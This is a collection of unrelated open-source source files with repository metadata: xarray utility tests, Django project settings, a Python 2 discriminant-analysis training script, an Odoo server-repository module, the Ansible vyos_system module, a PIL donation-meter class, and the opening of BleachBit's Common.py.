pydata/xarray | xarray/tests/test_utils.py | 1 | 10440 | from datetime import datetime
from typing import Hashable
import numpy as np
import pandas as pd
import pytest
from xarray.coding.cftimeindex import CFTimeIndex
from xarray.core import duck_array_ops, utils
from xarray.core.indexes import PandasIndex
from xarray.core.utils import either_dict_or_kwargs, iterate_nested
from . import assert_array_equal, requires_cftime, requires_dask
from .test_coding_times import _all_cftime_date_types
class TestAlias:
def test(self):
def new_method():
pass
old_method = utils.alias(new_method, "old_method")
assert "deprecated" in old_method.__doc__
with pytest.warns(Warning, match="deprecated"):
old_method()
def test_safe_cast_to_index():
dates = pd.date_range("2000-01-01", periods=10)
x = np.arange(5)
td = x * np.timedelta64(1, "D")
midx = pd.MultiIndex.from_tuples([(0,)], names=["a"])
for expected, array in [
(dates, dates.values),
(pd.Index(x, dtype=object), x.astype(object)),
(pd.Index(td), td),
(pd.Index(td, dtype=object), td.astype(object)),
(midx, PandasIndex(midx)),
]:
actual = utils.safe_cast_to_index(array)
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
@pytest.mark.parametrize(
"a, b, expected", [["a", "b", np.array(["a", "b"])], [1, 2, pd.Index([1, 2])]]
)
def test_maybe_coerce_to_str(a, b, expected):
a = np.array([a])
b = np.array([b])
index = pd.Index(a).append(pd.Index(b))
actual = utils.maybe_coerce_to_str(index, [a, b])
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
def test_maybe_coerce_to_str_minimal_str_dtype():
a = np.array(["a", "a_long_string"])
index = pd.Index(["a"])
actual = utils.maybe_coerce_to_str(index, [a])
expected = np.array("a")
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
@requires_cftime
def test_safe_cast_to_index_cftimeindex():
date_types = _all_cftime_date_types()
for date_type in date_types.values():
dates = [date_type(1, 1, day) for day in range(1, 20)]
expected = CFTimeIndex(dates)
actual = utils.safe_cast_to_index(np.array(dates))
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
assert isinstance(actual, type(expected))
# Test that datetime.datetime objects are never used in a CFTimeIndex
@requires_cftime
def test_safe_cast_to_index_datetime_datetime():
dates = [datetime(1, 1, day) for day in range(1, 20)]
expected = pd.Index(dates)
actual = utils.safe_cast_to_index(np.array(dates))
assert_array_equal(expected, actual)
assert isinstance(actual, pd.Index)
def test_multiindex_from_product_levels():
result = utils.multiindex_from_product_levels(
[pd.Index(["b", "a"]), pd.Index([1, 3, 2])]
)
np.testing.assert_array_equal(
result.codes, [[0, 0, 0, 1, 1, 1], [0, 1, 2, 0, 1, 2]]
)
np.testing.assert_array_equal(result.levels[0], ["b", "a"])
np.testing.assert_array_equal(result.levels[1], [1, 3, 2])
other = pd.MultiIndex.from_product([["b", "a"], [1, 3, 2]])
np.testing.assert_array_equal(result.values, other.values)
def test_multiindex_from_product_levels_non_unique():
result = utils.multiindex_from_product_levels(
[pd.Index(["b", "a"]), pd.Index([1, 1, 2])]
)
np.testing.assert_array_equal(
result.codes, [[0, 0, 0, 1, 1, 1], [0, 0, 1, 0, 0, 1]]
)
np.testing.assert_array_equal(result.levels[0], ["b", "a"])
np.testing.assert_array_equal(result.levels[1], [1, 2])
class TestArrayEquiv:
def test_0d(self):
# verify our work around for pd.isnull not working for 0-dimensional
# object arrays
assert duck_array_ops.array_equiv(0, np.array(0, dtype=object))
assert duck_array_ops.array_equiv(np.nan, np.array(np.nan, dtype=object))
assert not duck_array_ops.array_equiv(0, np.array(1, dtype=object))
class TestDictionaries:
@pytest.fixture(autouse=True)
def setup(self):
self.x = {"a": "A", "b": "B"}
self.y = {"c": "C", "b": "B"}
self.z = {"a": "Z"}
def test_equivalent(self):
assert utils.equivalent(0, 0)
assert utils.equivalent(np.nan, np.nan)
assert utils.equivalent(0, np.array(0.0))
assert utils.equivalent([0], np.array([0]))
assert utils.equivalent(np.array([0]), [0])
assert utils.equivalent(np.arange(3), 1.0 * np.arange(3))
assert not utils.equivalent(0, np.zeros(3))
def test_safe(self):
# should not raise exception:
utils.update_safety_check(self.x, self.y)
def test_unsafe(self):
with pytest.raises(ValueError):
utils.update_safety_check(self.x, self.z)
def test_compat_dict_intersection(self):
assert {"b": "B"} == utils.compat_dict_intersection(self.x, self.y)
assert {} == utils.compat_dict_intersection(self.x, self.z)
def test_compat_dict_union(self):
assert {"a": "A", "b": "B", "c": "C"} == utils.compat_dict_union(self.x, self.y)
with pytest.raises(
ValueError,
match=r"unsafe to merge dictionaries without "
"overriding values; conflicting key",
):
utils.compat_dict_union(self.x, self.z)
def test_dict_equiv(self):
x = {}
x["a"] = 3
x["b"] = np.array([1, 2, 3])
y = {}
y["b"] = np.array([1.0, 2.0, 3.0])
y["a"] = 3
assert utils.dict_equiv(x, y) # two nparrays are equal
y["b"] = [1, 2, 3] # np.array not the same as a list
assert utils.dict_equiv(x, y) # nparray == list
x["b"] = [1.0, 2.0, 3.0]
assert utils.dict_equiv(x, y) # list vs. list
x["c"] = None
assert not utils.dict_equiv(x, y) # new key in x
x["c"] = np.nan
y["c"] = np.nan
assert utils.dict_equiv(x, y) # as intended, nan is nan
x["c"] = np.inf
y["c"] = np.inf
assert utils.dict_equiv(x, y) # inf == inf
y = dict(y)
assert utils.dict_equiv(x, y) # different dictionary types are fine
y["b"] = 3 * np.arange(3)
assert not utils.dict_equiv(x, y) # not equal when arrays differ
def test_frozen(self):
x = utils.Frozen(self.x)
with pytest.raises(TypeError):
x["foo"] = "bar"
with pytest.raises(TypeError):
del x["a"]
with pytest.raises(AttributeError):
x.update(self.y)
assert x.mapping == self.x
assert repr(x) in (
"Frozen({'a': 'A', 'b': 'B'})",
"Frozen({'b': 'B', 'a': 'A'})",
)
def test_repr_object():
obj = utils.ReprObject("foo")
assert repr(obj) == "foo"
assert isinstance(obj, Hashable)
assert not isinstance(obj, str)
def test_repr_object_magic_methods():
o1 = utils.ReprObject("foo")
o2 = utils.ReprObject("foo")
o3 = utils.ReprObject("bar")
o4 = "foo"
assert o1 == o2
assert o1 != o3
assert o1 != o4
assert hash(o1) == hash(o2)
assert hash(o1) != hash(o3)
assert hash(o1) != hash(o4)
def test_is_remote_uri():
assert utils.is_remote_uri("http://example.com")
assert utils.is_remote_uri("https://example.com")
assert not utils.is_remote_uri(" http://example.com")
assert not utils.is_remote_uri("example.nc")
class Test_is_uniform_and_sorted:
def test_sorted_uniform(self):
assert utils.is_uniform_spaced(np.arange(5))
def test_sorted_not_uniform(self):
assert not utils.is_uniform_spaced([-2, 1, 89])
def test_not_sorted_uniform(self):
assert not utils.is_uniform_spaced([1, -1, 3])
def test_not_sorted_not_uniform(self):
assert not utils.is_uniform_spaced([4, 1, 89])
def test_two_numbers(self):
assert utils.is_uniform_spaced([0, 1.7])
def test_relative_tolerance(self):
assert utils.is_uniform_spaced([0, 0.97, 2], rtol=0.1)
class Test_hashable:
def test_hashable(self):
for v in [False, 1, (2,), (3, 4), "four"]:
assert utils.hashable(v)
for v in [[5, 6], ["seven", "8"], {9: "ten"}]:
assert not utils.hashable(v)
@requires_dask
def test_dask_array_is_scalar():
# regression test for GH1684
import dask.array as da
y = da.arange(8, chunks=4)
assert not utils.is_scalar(y)
def test_hidden_key_dict():
hidden_key = "_hidden_key"
data = {"a": 1, "b": 2, hidden_key: 3}
data_expected = {"a": 1, "b": 2}
hkd = utils.HiddenKeyDict(data, [hidden_key])
assert len(hkd) == 2
assert hidden_key not in hkd
for k, v in data_expected.items():
assert hkd[k] == v
with pytest.raises(KeyError):
hkd[hidden_key]
with pytest.raises(KeyError):
del hkd[hidden_key]
def test_either_dict_or_kwargs():
result = either_dict_or_kwargs(dict(a=1), None, "foo")
expected = dict(a=1)
assert result == expected
result = either_dict_or_kwargs(None, dict(a=1), "foo")
expected = dict(a=1)
assert result == expected
with pytest.raises(ValueError, match=r"foo"):
result = either_dict_or_kwargs(dict(a=1), dict(a=1), "foo")
@pytest.mark.parametrize(
["supplied", "all_", "expected"],
[
(list("abc"), list("abc"), list("abc")),
(["a", ..., "c"], list("abc"), list("abc")),
(["a", ...], list("abc"), list("abc")),
(["c", ...], list("abc"), list("cab")),
([..., "b"], list("abc"), list("acb")),
([...], list("abc"), list("abc")),
],
)
def test_infix_dims(supplied, all_, expected):
result = list(utils.infix_dims(supplied, all_))
assert result == expected
@pytest.mark.parametrize(
["supplied", "all_"], [([..., ...], list("abc")), ([...], list("aac"))]
)
def test_infix_dims_errors(supplied, all_):
with pytest.raises(ValueError):
list(utils.infix_dims(supplied, all_))
@pytest.mark.parametrize(
"nested_list, expected",
[
([], []),
([1], [1]),
([1, 2, 3], [1, 2, 3]),
([[1]], [1]),
([[1, 2], [3, 4]], [1, 2, 3, 4]),
([[[1, 2, 3], [4]], [5, 6]], [1, 2, 3, 4, 5, 6]),
],
)
def test_iterate_nested(nested_list, expected):
assert list(iterate_nested(nested_list)) == expected
| apache-2.0 | 7,916,387,651,723,424,000 | 30.164179 | 88 | 0.582759 | false |
tingcar/PSEP | src/PSEP/settings.py | 1 | 3680 | """
Django settings for PSEP project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a9j_-kq$z8#r(8h4m)74l&&gspv%%e=!*(rnys6m^(c13aq%sn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#my apps
'contact',
'enbuckets',
'profiles',
'internalmail',
'events',
#tools
'south',
'registration',
'debug_toolbar',
'dajaxice',
'dajax',
)
ACCOUNT_ACTIVATION_DAYS = 7
REGISTRATION_OPEN = False
auth_password_reset = '/'
AUTH_PROFILE_MODULE = 'profiles.profile'
LOGIN_REDIRECT_URL = '/accounts/dashboard/'
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'PSEP.urls'
WSGI_APPLICATION = 'PSEP.wsgi.application'
######## DATABASE #########
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.request',
'django.core.context_processors.csrf',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'dajaxice.finders.DajaxiceFinder',
)
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
# STATIC_URL = '/static/'
STATIC_URL = '/assets/'
MEDIA_URL='/media/'
#static
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','media')
STATIC_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','static-only')
STATICFILES_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','assets'),
)
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','templates'),
)
| apache-2.0 | -5,925,759,729,754,591,000 | 22.144654 | 110 | 0.701087 | false |
TakLee96/discriminant | train.py | 1 | 2430 | import numpy as np
from os import path
from scipy.io import loadmat
from timer import timer
from classifier import LDAClassifier, QDAClassifier
""" TODO: choose either mnist or spam >>HERE<< """
which = "spam.mat"
which = "mnist.mat"
""" TODO: choose either mnist or spam >>HERE<< """
timer.start("reading", which, "data from matlab file")
raw = loadmat(path.join(path.dirname(__file__), "data", which))
raw_data = raw['data']
raw_labl = raw['label'][0]
timer.end("done")
timer.start("permuting data randomly")
np.random.seed(0)
ordering = np.random.permutation(len(raw_data))
data = np.ndarray(shape=raw_data.shape, dtype=raw_data.dtype)
labl = np.ndarray(shape=raw_labl.shape, dtype=raw_labl.dtype)
for old, new in enumerate(ordering):
data[new] = raw_data[old]
labl[new] = raw_labl[old]
del raw, raw_data, raw_labl, ordering
timer.end("done")
def cross_validation(method, k=5):
if method == "lda":
Classifier = LDAClassifier
elif method == "qda":
Classifier = QDAClassifier
else:
raise Exception("lda or qda only")
timer.start("folding data into", k, "copies")
data_slice = [ None ] * k
labl_slice = [ None ] * k
train_rate = [ 0.0 ] * k
valid_rate = [ 0.0 ] * k
n = len(labl)
m = n / k
for i in range(k):
data_slice[i] = data[(i*m):min((i+1)*m,n)]
labl_slice[i] = labl[(i*m):min((i+1)*m,n)]
timer.end("done")
for j in range(k):
timer.start("validation iteration #", j)
training_data = np.concatenate(tuple(data_slice[i] for i in range(k) if i != j))
training_labl = np.concatenate(tuple(labl_slice[i] for i in range(k) if i != j))
print ".... data formating done"
c = LDAClassifier(training_data, training_labl)
print ".... classifier training done"
train_rate[j] = c.score(c.classify_all(training_data), training_labl)
print ".... training accuracy computation done"
valid_rate[j] = c.score(c.classify_all(data_slice[j]), labl_slice[j])
print ".... validation accuracy computation done"
timer.end("done; training accuracy =", train_rate[j], "; validation accuracy =", valid_rate[j])
print k, "fold cross validation for", method, "on dataset", which, "complete"
print ".... overall training accuracy =", np.mean(train_rate)
print ".... overall validation accuracy =", np.mean(valid_rate)
cross_validation("qda")
| mit | -644,527,991,301,725,700 | 33.714286 | 103 | 0.634979 | false |
marcoscrcamargo/ic | results.py | 1 | 2191 | import csv
import time
fieldnames = ['class', 'knn_hst', 'hst_pxl', 'mlp_hst', 'mlp_pxl', 'svm_hst', 'svm_pxl', 'ensemble_hst', 'ensemble_pxl', 'ensemble_all']
writer = None
file = 'results_' + str(time.ctime()) +'.csv'
def initializate(fname=file):
global writer
global file
file = fname
with open(fname, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
def write_row(label, knn_hst, hst_pxl, mlp_hst, mlp_pxl, svm_hst, svm_pxl, ensemble_hst, ensemble_pxl, ensemble_all):
global writer
with open(file, 'a') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow({ fieldnames[0]: label,
fieldnames[1]: knn_hst,
fieldnames[2]: hst_pxl,
fieldnames[3]: mlp_hst,
fieldnames[4]: mlp_pxl,
fieldnames[5]: svm_hst,
fieldnames[6]: svm_pxl,
fieldnames[7]: ensemble_hst,
fieldnames[8]: ensemble_pxl,
fieldnames[9]: ensemble_all})
def main():
initializate()
write_row('e', '1', '2', '0', '1', '2', '0', '1', '0', '2')
# write_csv = {'class':'none',
# 'knn_hst': str(knn_ret['hst']['label']) + '_' + str(knn_ret['hst'][str(knn_ret['hst']['label'])]),
# 'hst_pxl': str(knn_ret['pxl']['label']) + '_' + str(knn_ret['pxl'][str(knn_ret['pxl']['label'])]),
# 'mlp_hst': str(mlp_ret['hst']['label']) + '_' + str(mlp_ret['hst'][str(mlp_ret['hst']['label'])]),
# 'mlp_pxl': str(mlp_ret['pxl']['label']) + '_' + str(mlp_ret['pxl'][str(mlp_ret['pxl']['label'])]),
# 'svm_hst': str(svm_ret['hst']['label']) + '_' + str(svm_ret['hst'][str(svm_ret['hst']['label'])]),
# 'svm_pxl': str(svm_ret['pxl']['label']) + '_' + str(svm_ret['pxl'][str(svm_ret['pxl']['label'])]),
# 'ensemble_hst': str(hst_c['label']) + '_' + str(hst_c[str(hst_c['label'])]),
# 'ensemble_pxl': str(pxl_c['label']) + '_' + str(pxl_c[str(pxl_c['label'])]),
# 'ensemble_all': str(all_c['label']) + '_' + str(all_c[str(all_c['label'])])}
if __name__ == "__main__":
main() | gpl-3.0 | 6,560,752,996,770,302,000 | 41.980392 | 136 | 0.524418 | false |
lisogallo/odoo-it-infra | it_infrastructure/server_repository.py | 1 | 2915 | # -*- coding: utf-8 -*-
from openerp import models, fields, api, _
from openerp.exceptions import except_orm
from fabric.api import cd, sudo, settings
from fabric.contrib.files import exists
import os
class server_repository(models.Model):
""""""
_name = 'it_infrastructure.server_repository'
_description = 'server_repository'
_rec_name = 'repository_id'
repository_id = fields.Many2one(
'it_infrastructure.repository',
string='Repository',
required=True
)
path = fields.Char(
string='Path'
)
server_id = fields.Many2one(
'it_infrastructure.server',
string='server_id',
ondelete='cascade',
required=True
)
@api.one
def get_repository(self):
print 'Getting repository'
self.path = self.repository_id.get_repository(self.server_id)[0]
@api.one
def update_repository(self, path=False):
print 'Updating repository'
self.server_id.get_env()
if not path:
path = self.path
if not path or not exists(path, use_sudo=True):
# raise except_orm(
# _('No Repository Folder!'),
# _("Please check that the especified path '%s' exists \
# in order to download for first time!") % path
# )
cmd = 'git clone %s %s' % (self.repository_id.url, path)
try:
# sudo(cmd, user=self.server_id.user_name, group='odoo')
sudo(cmd, user='odoo', group='odoo')
except SystemExit, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Unknown system error')
)
else:
cmd = 'git pull'
with cd(path.strip()):
try:
sudo(cmd)
except Exception, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Command output: %s') % e
)
except SystemExit, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Unknown system error')
)
@api.one
def get_update_repository(self):
self.server_id.get_env()
if not self.path:
# Check if repository on path
path = os.path.join(
self.server_id.sources_path, self.repository_id.directory)
if exists(path, use_sudo=True):
                # the repo apparently already exists, so try to update it
self.update_repository(path)
self.path = path
else:
self.get_repository()
else:
self.update_repository()
return True
| agpl-3.0 | -4,230,107,899,597,576,000 | 31.032967 | 74 | 0.50223 | false |
tdtrask/ansible | lib/ansible/modules/network/vyos/vyos_system.py | 1 | 6315 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: "vyos_system"
version_added: "2.3"
author: "Nathaniel Case (@qalthos)"
short_description: Run `set system` commands on VyOS devices
description:
- Runs one or more commands on remote devices running VyOS.
This module can also be introspected to validate key parameters before
returning successfully.
extends_documentation_fragment: vyos
notes:
- Tested against VYOS 1.1.7
options:
host_name:
description:
- Configure the device hostname parameter. This option takes an ASCII string value.
domain_name:
description:
- The new domain name to apply to the device.
name_server:
description:
- A list of name servers to use with the device. Mutually exclusive with
I(domain_search)
required: false
default: null
domain_search:
description:
- A list of domain names to search. Mutually exclusive with
I(name_server)
state:
description:
- Whether to apply (C(present)) or remove (C(absent)) the settings.
default: present
choices: ['present', 'absent']
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- set system hostname vyos01
- set system domain-name foo.example.com
"""
EXAMPLES = """
- name: configure hostname and domain-name
vyos_system:
host_name: vyos01
domain_name: test.example.com
- name: remove all configuration
vyos_system:
state: absent
- name: configure name servers
vyos_system:
name_server:
- 8.8.8.8
- 8.8.4.4
- name: configure domain search suffixes
vyos_system:
domain_search:
- sub1.example.com
- sub2.example.com
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.vyos.vyos import get_config, load_config
from ansible.module_utils.network.vyos.vyos import vyos_argument_spec
def spec_key_to_device_key(key):
device_key = key.replace('_', '-')
    # domain-search is longer than just its key
if device_key == 'domain-search':
device_key += ' domain'
return device_key
def config_to_dict(module):
data = get_config(module)
config = {'domain_search': [], 'name_server': []}
for line in data.split('\n'):
if line.startswith('set system host-name'):
config['host_name'] = line[22:-1]
elif line.startswith('set system domain-name'):
config['domain_name'] = line[24:-1]
elif line.startswith('set system domain-search domain'):
config['domain_search'].append(line[33:-1])
elif line.startswith('set system name-server'):
config['name_server'].append(line[24:-1])
return config
def spec_to_commands(want, have):
commands = []
state = want.pop('state')
# state='absent' by itself has special meaning
if state == 'absent' and all(v is None for v in want.values()):
# Clear everything
for key in have:
commands.append('delete system %s' % spec_key_to_device_key(key))
for key in want:
if want[key] is None:
continue
current = have.get(key)
proposed = want[key]
device_key = spec_key_to_device_key(key)
# These keys are lists which may need to be reconciled with the device
if key in ['domain_search', 'name_server']:
if not proposed:
# Empty list was passed, delete all values
commands.append("delete system %s" % device_key)
for config in proposed:
if state == 'absent' and config in current:
commands.append("delete system %s '%s'" % (device_key, config))
elif state == 'present' and config not in current:
commands.append("set system %s '%s'" % (device_key, config))
else:
if state == 'absent' and current and proposed:
commands.append('delete system %s' % device_key)
elif state == 'present' and proposed and proposed != current:
commands.append("set system %s '%s'" % (device_key, proposed))
return commands
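# Behaviour sketch (input dicts assumed for illustration): with
#   want = {'host_name': 'vyos01', 'domain_name': None, 'domain_search': None,
#           'name_server': None, 'state': 'present'}
#   have = {'host_name': 'vyos00'}
# this function returns ["set system host-name 'vyos01'"].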
def map_param_to_obj(module):
return {
'host_name': module.params['host_name'],
'domain_name': module.params['domain_name'],
'domain_search': module.params['domain_search'],
'name_server': module.params['name_server'],
'state': module.params['state']
}
def main():
argument_spec = dict(
host_name=dict(type='str'),
domain_name=dict(type='str'),
domain_search=dict(type='list'),
name_server=dict(type='list', aliases=['name_servers']),
state=dict(type='str', default='present', choices=['present', 'absent']),
)
argument_spec.update(vyos_argument_spec)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[('domain_name', 'domain_search')],
)
warnings = list()
result = {'changed': False, 'warnings': warnings}
want = map_param_to_obj(module)
have = config_to_dict(module)
commands = spec_to_commands(want, have)
result['commands'] = commands
if commands:
commit = not module.check_mode
response = load_config(module, commands, commit=commit)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -1,098,957,829,033,216,400 | 28.787736 | 89 | 0.633096 | false |
greggian/TapdIn | django/db/backends/sqlite3/creation.py | 1 | 3339 | import os
import sys
from django.conf import settings
from django.db.backends.creation import BaseDatabaseCreation
class DatabaseCreation(BaseDatabaseCreation):
# SQLite doesn't actually support most of these types, but it "does the right
# thing" given more verbose field definitions, so leave them as is so that
# schema inspection is more useful.
data_types = {
'AutoField': 'integer',
'BooleanField': 'bool',
'CharField': 'varchar(%(max_length)s)',
'CommaSeparatedIntegerField': 'varchar(%(max_length)s)',
'DateField': 'date',
'DateTimeField': 'datetime',
'DecimalField': 'decimal',
'FileField': 'varchar(%(max_length)s)',
'FilePathField': 'varchar(%(max_length)s)',
'FloatField': 'real',
'IntegerField': 'integer',
'IPAddressField': 'char(15)',
'NullBooleanField': 'bool',
'OneToOneField': 'integer',
'PositiveIntegerField': 'integer unsigned',
'PositiveSmallIntegerField': 'smallint unsigned',
'SlugField': 'varchar(%(max_length)s)',
'SmallIntegerField': 'smallint',
'TextField': 'text',
'TimeField': 'time',
}
def sql_for_pending_references(self, model, style, pending_references):
"SQLite3 doesn't support constraints"
return []
def sql_remove_table_constraints(self, model, references_to_delete, style):
"SQLite3 doesn't support constraints"
return []
def _create_test_db(self, verbosity, autoclobber):
if settings.TEST_DATABASE_NAME and settings.TEST_DATABASE_NAME != ":memory:":
test_database_name = settings.TEST_DATABASE_NAME
# Erase the old test database
if verbosity >= 1:
print "Destroying old test database..."
if os.access(test_database_name, os.F_OK):
if not autoclobber:
confirm = raw_input("Type 'yes' if you would like to try deleting the test database '%s', or 'no' to cancel: " % test_database_name)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print "Destroying old test database..."
os.remove(test_database_name)
except Exception, e:
sys.stderr.write("Got an error deleting the old test database: %s\n" % e)
sys.exit(2)
else:
print "Tests cancelled."
sys.exit(1)
if verbosity >= 1:
print "Creating test database..."
else:
test_database_name = ":memory:"
return test_database_name
def _destroy_test_db(self, test_database_name, verbosity):
if test_database_name and test_database_name != ":memory:":
# Remove the SQLite database file
os.remove(test_database_name)
| apache-2.0 | -5,355,491,434,208,322,000 | 45.7 | 152 | 0.512429 | false |
FabianWe/csd-freiburg-forms | csd_freiburg_forms/donate_o_meter/donate_o_meter.py | 1 | 2011 | # Copyright (C) 2016 Fabian Wenzelmann
#
# This file is part of csd-freiburg-forms.
#
# csd-freiburg-forms is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# csd-freiburg-forms is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with csd-freiburg-forms. If not, see <http://www.gnu.org/licenses/>.
#
from PIL import Image
class DonateOMeter:
def __init__(self, background, filling, aim, box=None):
self.background = background
self.filling = filling
self.aim = aim
if box is None:
width, height = background.size
box = (0, 0, width - 1, height - 1)
self.box = box
def draw(self, current):
box = self.box
# otherwise compute the percent and crop the fill area
percent = current / self.aim
width, height = self.background.size
mh = box[3] - box[1]
ch = int(mh * percent)
# first check if ch is zero, in this case return the background
if ch <= 0:
return self.background.copy()
# check if ch is the height of the box, in this case return
# the filling
if ch >= (box[3] - box[1]):
return self.filling.copy()
img = self.background.copy()
crop_left = box[0]
crop_upper = box[3] - ch
crop_right = box[2]
crop_lower = box[3]
# crop the designated area from the image
meter_area = self.filling.crop(
(crop_left, crop_upper, crop_right, crop_lower))
img.paste(meter_area, (crop_left, crop_upper))
return img
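# Usage sketch (file names are assumptions; any two equally sized images for
# the empty and full meter will do):
#   background = Image.open('meter_empty.png')
#   filling = Image.open('meter_full.png')
#   meter = DonateOMeter(background, filling, aim=5000)
#   meter.draw(1250).save('meter_25_percent.png')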
| gpl-3.0 | -3,033,785,776,946,643,500 | 33.672414 | 79 | 0.632521 | false |
maximilianofaccone/puppy-siberian | usr/share/bleachbit/Common.py | 1 | 7633 | # vim: ts=4:sw=4:expandtab
# -*- coding: UTF-8 -*-
# BleachBit
# Copyright (C) 2014 Andrew Ziem
# http://bleachbit.sourceforge.net
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Code that is commonly shared throughout BleachBit
"""
import gettext
import locale
import os
import sys
import traceback
if 'nt' == os.name:
from win32com.shell import shell, shellcon
APP_VERSION = "1.2"
APP_NAME = "BleachBit"
APP_URL = "http://bleachbit.sourceforge.net"
print "info: starting %s version %s" % (APP_NAME, APP_VERSION)
socket_timeout = 10
# Setting below value to false disables update notification (useful
# for packages in repositories).
online_update_notification_enabled = True
#
# Paths
#
# Windows
bleachbit_exe_path = None
if hasattr(sys, 'frozen'):
# running frozen in py2exe
bleachbit_exe_path = os.path.dirname(
unicode(sys.executable, sys.getfilesystemencoding()))
else:
# __file__ is absolute path to bleachbit/Common.py
bleachbit_exe_path = os.path.dirname(
unicode(__file__, sys.getfilesystemencoding()))
# license
license_filename = None
license_filenames = ('/usr/share/common-licenses/GPL-3', # Debian, Ubuntu
os.path.join(
bleachbit_exe_path, 'COPYING'), # Microsoft Windows
'/usr/share/doc/bleachbit-' + APP_VERSION +
'/COPYING', # CentOS, Fedora, RHEL
'/usr/share/doc/packages/bleachbit/COPYING',
# OpenSUSE 11.1
'/usr/share/doc/bleachbit/COPYING', # Mandriva
'/usr/pkg/share/doc/bleachbit/COPYING', # NetBSD 5
'/usr/share/licenses/common/GPL3/license.txt') # Arch Linux
for lf in license_filenames:
if os.path.exists(lf):
license_filename = lf
break
# configuration
portable_mode = False
options_dir = None
if 'posix' == os.name:
options_dir = os.path.expanduser("~/.config/bleachbit")
elif 'nt' == os.name:
if os.path.exists(os.path.join(bleachbit_exe_path, 'bleachbit.ini')):
# portable mode
portable_mode = True
options_dir = bleachbit_exe_path
else:
# installed mode
options_dir = os.path.expandvars("${APPDATA}\\BleachBit")
options_file = os.path.join(options_dir, "bleachbit.ini")
# personal cleaners
personal_cleaners_dir = os.path.join(options_dir, "cleaners")
# system cleaners
if sys.platform.startswith('linux'):
system_cleaners_dir = '/usr/share/bleachbit/cleaners'
